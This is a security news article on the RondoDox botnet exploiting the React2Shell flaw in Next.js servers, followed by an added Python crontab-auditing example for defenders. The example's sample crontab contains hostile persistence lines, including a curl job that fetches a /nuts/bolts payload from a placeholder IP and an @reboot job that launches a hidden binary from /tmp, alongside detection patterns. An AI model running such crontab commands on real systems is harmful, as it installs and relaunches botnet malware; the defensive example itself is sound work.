Malware | January 4, 2026 | 4 min read

RondoDox Botnet Targets 90K Servers via React2Shell

Nine-month-old botnet campaign pivots to exploit CVE-2025-55182 in Next.js, deploying cryptominers and Mirai variants across exposed instances.

James Rivera

A botnet campaign active since March 2025 has added the React2Shell vulnerability to its arsenal, targeting over 90,000 exposed Next.js servers with cryptocurrency miners and Mirai-based malware. CloudSEK researchers published new analysis this week detailing RondoDox's nine-month evolution from reconnaissance to mass exploitation.

The Campaign Timeline

CloudSEK's research identifies three distinct operational phases:

March to April 2025 - Reconnaissance and vulnerability testing. The operators scanned for vulnerable web applications without deploying payloads, likely building target lists.

April to June 2025 - Automated web application exploitation. RondoDox began compromising systems but focused on persistence rather than aggressive payload deployment.

July 2025 to present - Large-scale IoT botnet deployment. The campaign shifted to mass exploitation with coinminers and DDoS capabilities.

The operators started scanning for vulnerable Next.js servers on December 8, 2025—just five days after the React2Shell vulnerability disclosure. By December 11, they were actively deploying botnet clients.

Scale of Exposure

Shadowserver Foundation data shows approximately 90,300 Next.js instances remain vulnerable to CVE-2025-55182 as of December 31, 2025. Geographic distribution:

Country          Vulnerable Instances
United States    68,400
Germany          4,300
France           2,800
India            1,500
Other            13,300

The U.S. dominance in vulnerable instances isn't surprising given the popularity of Next.js among American startups and enterprises. But it also means American organizations face disproportionate risk from RondoDox activity.

The Payloads

After compromising a server, RondoDox deploys multiple payloads from paths that suggest the operators have a sense of humor—or contempt for their targets:

  • /nuts/poop - A coinminer designed to steal computing resources
  • /nuts/bolts - Botnet loader and health checking component
  • /nuts/x86 - A Mirai variant for DDoS and lateral movement

The malware demonstrates competitive behavior that's become common in botnet operations. It terminates rival coinminers, removes artifacts from previous attacks, and scrubs Docker-based payloads left by other threat actors. Every 45 seconds, it checks running processes and kills anything not on its whitelist—preventing reinfection by competitors while maintaining control.

Evasion Techniques

RondoDox stands out for its traffic mimicry capabilities. The botnet disguises command-and-control communications to look like gaming platform traffic or VPN connections. This makes detection through network monitoring more difficult, as security teams must distinguish malicious traffic from legitimate gaming or remote work activity.

Persistence comes through /etc/crontab modifications. The malware creates scheduled jobs that relaunch the botnet client if terminated, and it monitors for attempts to remove these entries.

Connection to Broader React2Shell Exploitation

We covered the React2Shell vulnerability's weaponization in ransomware campaigns last month. RondoDox represents a parallel threat—while ransomware operators use React2Shell for high-value targeted attacks, RondoDox pursues volume. The same vulnerability, different business models.

The vulnerability's severity makes this predictable. CVE-2025-55182 is an unauthenticated remote code execution flaw affecting default Next.js configurations. Applications created with create-next-app are immediately exploitable without code modifications. When 39% of cloud environments contain vulnerable instances (per Wiz Research), opportunistic botnets will inevitably follow disclosure.

Recommended Mitigations

Organizations running Next.js should:

  1. Patch immediately - Update to patched React and Next.js versions. This is non-negotiable.
  2. Segment IoT devices - Move IoT and development systems into dedicated VLANs with restricted outbound access.
  3. Deploy WAF rules - Block known React2Shell exploit patterns at the edge.
  4. Monitor for suspicious processes - Watch for unexpected cron jobs and processes communicating with unknown IPs.
  5. Block known C2 infrastructure - Add published IOCs to firewall blocklists.
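A defender-side check for the /etc/crontab persistence described above and for mitigation 4 (unexpected cron jobs). This is an added example, not code from the article or from CloudSEK: it parses system-crontab text and flags jobs that reference the /nuts/ payload names the article lists, execute from world-writable directories, or fetch content on every run. The sample crontab, the 203.0.113.10 documentation address and the local filenames are constructed for this example; the two "world-writable" and "downloader" criteria are assumptions about what legitimate system cron jobs do not do.

```python
import re

# Constructed sample in /etc/crontab format (five time fields, user, command).
# The last two jobs are modelled on the crontab persistence the article
# describes; the /nuts/ payload names come from the article, the host is a
# documentation address and the local filenames are assumptions.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* *     * * *   root    /dev/shm/.bolts || curl -s http://203.0.113.10/nuts/bolts -o /dev/shm/.bolts
@reboot         root    /tmp/.x86 >/dev/null 2>&1
"""

# Payload paths named in the article.
PAYLOAD_NAMES = ("nuts/poop", "nuts/bolts", "nuts/x86")
# Assumption: distribution cron jobs do not run binaries from these directories.
WRITABLE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Assumption: a job that fetches content on every run is a relaunch loop.
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
# Schedule is an @keyword or five whitespace-separated fields, then user, then command.
CRON_LINE = re.compile(r"^(?P<sched>@\w+|(?:\S+\s+){5})\s*(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_crontab(text):
    """Yield (line_no, user, command) for job lines; skip blanks, comments and VAR=value."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"\w+=", line):
            continue
        m = CRON_LINE.match(line)
        if m:
            yield no, m.group("user"), m.group("cmd").strip()


def audit_crontab(text):
    """Return (line_no, user, command, reasons) for every job matching an indicator."""
    findings = []
    for no, user, cmd in parse_crontab(text):
        reasons = []
        if any(name in cmd for name in PAYLOAD_NAMES):
            reasons.append("references a RondoDox payload path")
        if any(d in cmd for d in WRITABLE_DIRS):
            reasons.append("executes from a world-writable directory")
        if DOWNLOADER.search(cmd):
            reasons.append("downloads content at run time")
        if reasons:
            findings.append((no, user, cmd, reasons))
    return findings
```

Run `audit_crontab(open("/etc/crontab").read())` on a host under investigation; per-user crontabs and /etc/cron.d files use the same format apart from the user field and can be checked with a trivially adjusted regex.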

For development teams, this vulnerability is a reminder that framework updates aren't optional. The window between disclosure and mass exploitation continues to shrink—five days in this case.

See our malware guide for additional context on botnet operations and how to recognize signs of compromise.

The Persistence Problem

RondoDox has been active for nine months, adapting to new vulnerabilities as they emerge. This longevity suggests the operators are treating it as a business rather than a short-term campaign. They invest in maintenance, add new exploit capabilities, and actively defend their territory against competing botnets.

For security teams, this means remediation must be thorough. Patching the vulnerability isn't enough if the botnet already established persistence. The crontab modifications and process monitoring capabilities mean a compromised system needs full forensic analysis, not just a patch and a reboot.

The 90,000 vulnerable instances represent a target-rich environment. Even with security teams racing to patch, RondoDox operators have already had weeks to establish footholds. The question for many organizations isn't whether they're vulnerable—it's whether they were already compromised before they got around to patching.
